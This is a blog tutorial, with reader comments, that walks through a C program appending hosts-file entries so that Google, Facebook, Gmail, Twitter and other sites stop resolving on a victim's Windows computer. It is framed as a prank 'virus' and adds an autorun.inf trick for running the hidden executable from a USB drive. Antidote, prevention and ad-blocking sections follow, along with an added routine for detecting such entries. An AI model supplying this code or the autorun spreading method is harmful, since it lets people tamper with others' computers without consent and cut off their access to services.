We will make a “virus” which will block orkut, facebook, google, gmail, twitter and some others on Microsoft Windows systems. This one is very easy to code and effective, and very good for playing a prank on friends. But before you do anything, please note that I will NOT be liable for any kind of damage done to any computer system or any other physical or intellectual property. You and only you are liable for everything. Sorry for the message, but I personally do not think such things will happen. To make sure such things do not happen, do not apply this to anyone who does important work with the sites which are blocked, and whoever you apply this upon, remember to unblock the sites shortly. The antidote is also supplied with this post.

What’s The Idea?

I am not a very good programmer or a virus maker, so the idea is very simple. The code we are going to write does not act like a virus as defined in Wikipedia and so it does not qualify, but we can call it a “virus” with the quotes on :D. It is still fun, though. There is a file named “hosts” in Microsoft Windows systems (also in other systems). The full path of this file is as below:

Microsoft Windows XP: C:\WINDOWS\system32\drivers\etc\hosts
Microsoft Windows 2K: C:\WINNT\system32\drivers\etc\hosts
Microsoft Windows Vista: C:\WINDOWS\system32\drivers\etc\hosts

This file contains the mapping of IP addresses to the host names of websites. That means it contains the IP address to contact for each host listed in that file. This file is loaded in the memory when Windows is started. Each line contains an IP address followed by a host name. This signifies that the IP address should be contacted if the corresponding host name is entered. We will map each of the hosts to IP address 127.0.0.1 or some nonexistent address like 255.255.255.255. 127.0.0.1 is the IP address of your computer (localhost).

127.0.0.1        www.google.com

After adding the above line and saving the file, relaunch the browser. When you enter http://www.google.com it will try to connect to 127.0.0.1 instead of querying the DNS server, and end up at the localhost. If you don’t have any webserver running it will show “page cannot be displayed”, so essentially it will block http://www.google.com. We will simply write a C language program which opens this file and then appends the target websites to it. If you have a webserver running then it will open up the default page of the localhost. So to make sure it does not go anywhere else we can add a nonexistent IP like 255.255.255.255 or 123.456.789.000 .

The above are the default paths of the “hosts” file, but they might not apply in every case. For example, one might not have his/her Windows installation on the C: drive, or he/she might not even have a C: drive at all. Moreover, the Windows installation directory might have some other name. In that case the paths would change. So how can we know in what path the “hosts” file is? We will use the Windows environment variable SystemRoot . This environment variable stores the path to the Windows installation directory. So the path to the hosts file will essentially become %SystemRoot%\system32\drivers\etc\hosts . We will make use of the getenv () function from the standard library header stdlib.h to fetch the value of the SystemRoot variable and then concatenate the rest of the path to it to get the absolute path of the hosts file, as below:

char hosts_file_path[FILENAME_MAX];
strcpy (hosts_file_path, getenv ("SystemRoot"));
strcat (hosts_file_path, "\\system32\\drivers\\etc\\hosts");
/* After these two lines "hosts_file_path" will have the absolute path to the "hosts" file */

We will use the above path to get the hosts file. This will make the code work in almost any Windows installation.

To know more about the hosts file visit the below links:

The Code

Now the code, it has only three steps:

  1. Open the “hosts” file in append mode
  2. Append the line entries
  3. Close the file

The code is presented below:

/*
 * File Name   : bsit.c
 * Description : A cheap code to append the hosts file
 *               under Microsoft Windows and block popular
 *               sites.
 * Antidote    : Remove the appended lines from the hosts
 *               file and save it.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main (void)
{
  FILE *fp;
  int i;
  char hosts_file_path[FILENAME_MAX];
  char ip[] = "255.255.255.255";

  /* Add your sites in the below list. */
  char *blist[] = {
    "www.orkut.com",
    "orkut.com",
    "www.google.com",
    "google.com",
    "www.google.co.in",
    "google.co.in",
    "www.gmail.com",
    "gmail.com",
    "www.facebook.com",
    "facebook.com",
    "www.yahoo.com",
    "yahoo.com",
    "www.twitter.com",
    "twitter.com",
    "#"
  };

  strcpy (hosts_file_path, getenv ("SystemRoot"));
  strcat (hosts_file_path, "\\system32\\drivers\\etc\\hosts");

  if ((fp = fopen (hosts_file_path, "a")) == NULL)
    return 0;

  for (i = 0; blist[i][0] != '#'; i++)
    {
      fputs (ip, fp);
      fputs ("        ", fp);
      fputs (blist[i], fp);
      fputs ("\n", fp);
    }

  fclose (fp);
  return 0;
}

Now just compile it with any compiler, like GCC, MinGW, Digital Mars, Borland, and make sure you are in a Microsoft Windows environment. (Please avoid Turbo C++ v3.0). This needs to execute only once. The main drawback is that you need to execute this program as administrator, making this a cheap attack. But most general Microsoft Windows users log in as administrator.

Enhancements

Autorunning this compiled executable from a plugged-in USB flash drive will be an enhancement and make it more vicious. Open a text editor, enter the following code and save the file with the name “autorun.inf” in your USB drive along with the compiled exe file.

[autorun]
open=compiled_file.exe

When making the inf file make sure that the extension is inf. By default in Windows the extensions are not shown. So when you save the text file as autorun.inf it will actually be autorun.inf.txt. So first show the file extensions from the Folder Options, or right click -> new -> text file and then enter the name.

And also make the exe file hidden; it can also be made read only. Further enhancements could be done making it able to replicate and spread into other connected USB flash drives or portable hard disks, but I will stop here. And of course adding more sites to the list will make it better.
Note: The new XP update has stopped auto running feature.

Antidote

The antidote is to remove the appended lines from the file. In the worst case the executable file might have run many times and appended the same lines more than once. To clean up the mess we need to manually look for the entries and remove them, or use a pattern match program (I do not know any pattern match program in Windows). Or we could just make a backup before we append to the file (do viruses take data backups of the targets?).
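One way to find and strip such entries, as an added example that is not part of the original post: a small C routine that flags hosts lines mapping any name other than localhost to a loopback, 0.0.0.0, broadcast or invalid address, and builds a cleaned copy without them. The sample text and the names is_sink and audit_hosts are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: stock entries plus lines of the kind bsit.c appends. */
static const char SAMPLE[] =
    "127.0.0.1       localhost\n"
    "255.255.255.255        www.google.com\n"
    "255.255.255.255        google.com\n"
    "123.456.789.000 twitter.com   # not a valid address\n"
    "192.168.1.10    fileserver\n";

/* 1 if addr is loopback, 0.0.0.0, broadcast, or not a valid IPv4 dotted quad. */
static int is_sink(const char *addr)
{
    unsigned a, b, c, d; char extra;
    if (strchr(addr, ':')) return strcmp(addr, "::1") == 0;  /* IPv6 literal */
    if (sscanf(addr, "%u.%u.%u.%u%c", &a, &b, &c, &d, &extra) != 4
        || a > 255 || b > 255 || c > 255 || d > 255)
        return 1;
    return a == 127 || (a | b | c | d) == 0 || (a & b & c & d) == 255;
}

/* Copies unflagged lines to clean (strlen(text) + 2 bytes); returns the number
   of non-localhost names that point at a sink address. */
int audit_hosts(const char *text, char *clean)
{
    int flagged = 0;
    for (clean[0] = '\0'; *text; ) {
        size_t len = strcspn(text, "\n");
        char line[512], addr[64], name[256];
        int pos = 0, used = 0, bad = 0;
        snprintf(line, sizeof line, "%.*s", (int)len, text);
        line[strcspn(line, "#")] = '\0';         /* drop trailing comment */
        if (sscanf(line, "%63s%n", addr, &pos) == 1 && is_sink(addr))
            for (; sscanf(line + pos, "%255s%n", name, &used) == 1; pos += used)
                bad += strcmp(name, "localhost") != 0;
        if (bad == 0)                            /* keep the original line */
            sprintf(clean + strlen(clean), "%.*s\n", (int)len, text);
        flagged += bad;
        text += len + (text[len] == '\n');
    }
    return flagged;
}

int main(void)
{
    char clean[sizeof SAMPLE + 1];
    printf("%d suspicious mapping(s)\n%s", audit_hosts(SAMPLE, clean), clean);
    return 0;
}
```

Deliberate blocklists of the kind described under “The Good Side” use the same mappings, so flagged lines are candidates for review rather than proof of tampering. A line that lists localhost together with another name is dropped whole from the cleaned copy.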

Prevention

To prevent this code, and also tons of other codes, even a lot of heavyweight ones, the best way is to always use a user account with limited permissions, and not the administrator account. Usage of the administrator account makes way for the majority of viruses to access your system files and tamper with them. So make a normal user account and limit its permissions. When surfing the Internet it is best to use an account with minimal permissions. Also disable the autorun feature. This will save you from a major part of attacks and cheap attacks like this one. For the heavyweight true cracker-hacker attack keep your copy of Microsoft Windows updated and the firewall on, and never use a pirated copy and convert it to a professional edition (they really never convert). We cannot make this cheap attack on a GNU+Linux system’s /etc/hosts as everyone uses a non-root user to log in. So as you can see, Windows users themselves open the doors by using the administrator account to log in and make the malicious program’s work easy.

The Good Side

The hosts file is the best way to block ad sites, porn sites, and virus and malware sites. What you have to do is add a list of bad sites to the hosts file and map them to 127.0.0.1, and you will never get into those bad sites. For a bad site listing for the hosts file click the following link and use that file. This file contains a ton of bad sites listed. The big ad-ware hi-fi software also uses this file to block unwanted sites. To get a list of bad sites visit http://www.mvps.org/winhelp2002/hosts.htm


23 thoughts on “Make a website block virus”

    1. Could not understand if this comment was a spam or not, it passed the spam filter, but is not related to the content.
      Whatever, this blog is hosted in wordpress.com, and all the administrations are done by wordpress.com officials. The spam filters are also maintained by them. wordpress.com uses Akismet as the spam filter, which is one of the best out there. Check out Akismet here: http://akismet.com/

      1. hi… i have a confusion……..if i make this Virus …..will it only block sites on that particular computer or….it will block to other users as well….. like if i put this virus on a chat room……. will other users not be able to login to that particular website or its just me?

        please clear this

        1. If you read the post you will find that this is not a true virus, and simply uses the windows (linux) hosts files to block the website in one specific computer under any user. This code is only a one click solution which adds the lines in the hosts file where we specify certain domains to resolve as some invalid IP address, and thus when you enter that site, the invalid IP is found instead of a DNS looked up correct IP, and the site does not open.
          You cannot do this to any chat room or else. This is more an annoying prank than a virus. I will suggest a read on the hosts file from the link provided in the post.

  1. Quite interesting, well I just wanted some songs and got your blog. Thanks for this one mate ;) I just loved it. An additional comment or feedback which I would like to give is that this theme is quite boring and you need to work on it but everything else is fine.

  2. I was looking for a good read covering this issue . Searching in Google I found this great site. After going over this article I’m really happy to say that I have found just what I was looking for. I will make sure to save blog and come again on a constant basis. Thanks! :-)

  3. The hosts file is present in all UNIX-like systems. This code will work in Linux too. Just put the filesystem related parts in a #IFDEF PLATFORM_WIN32 or something.

    1. Yes, definitely it will work in Linux, or other UNIX-like platforms. What is needed is to simply replace the file absolute path. Like for Linux the file is “/etc/hosts” .
      The main thing which the code exploits is the user negligence. The code will only work when executed in a superuser mode or equivalent mode such that it has proper permissions to edit the hosts file. Now generally almost all GNU+Linux users log in with a separate user account, and a very rare population (although not zero) log in as root (I don’t know why, probably they don’t know about ‘sudo’). But as far as I have seen, general Microsoft Windows users almost always log in with an administration account, so this small code can do what it wants to. ;-)

    1. Whenever the cache expires, it would be blocked. This is not actual blocking, it is like a pseudo block; only the names you enter would be mapped to the hosts file if the name has a corresponding entry. This is actually not a proper way of blocking. To block a site is to forbid any communications to or from a set of IP addresses, which should be specified under the router table, firewall software.
